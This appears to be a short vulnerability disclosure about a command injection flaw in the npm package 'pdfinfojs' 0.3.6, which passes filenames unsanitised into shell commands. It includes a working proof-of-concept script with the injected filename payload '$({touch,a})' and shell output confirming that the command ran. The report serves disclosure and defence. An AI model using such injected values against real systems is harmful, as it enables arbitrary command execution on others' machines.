Hello , there is a Command Injection vulnerability on the “pdfinfojs” module.
module name: pdfinfojsversion:0.3.6npm page: https://www.npmjs.com/package/pdfinfojs
> pdfinfo shell wrapper for Node.js
10 downloads in the last day
61 downloads in the last week
106 downloads in the last month
> The module appends the filename parameter to the command on the lines 28, 47 and 72 without parsing the user input, thus leading to a Command Injection.
$ npm install pdfinfojs
$({touch,a})
:var pdfinfo = require('pdfinfojs'),
pdf = new pdfinfo('$({touch,a})'); // Malicious payload
pdf.getInfo(function(err, info, params) {
if (err) {
console.error(err.stack);
}
else {
console.log(info); //info is an object
console.log(params); // commandline params passed to pdfinfo cmd
}
});
there are a lot of possibles payloads to achieve this, used this brace expansion just because space in the file name sucks
$ node index.js
Error
... it throws an error, but the execution is successful
$ ls
a index.js
It is advisable to use a module that explicitly isolates the parameters to the pdfinfo
command.
( contacted the maintainer || opened issue ) = False
An attacker can execute arbitrary commands on the victim’s machine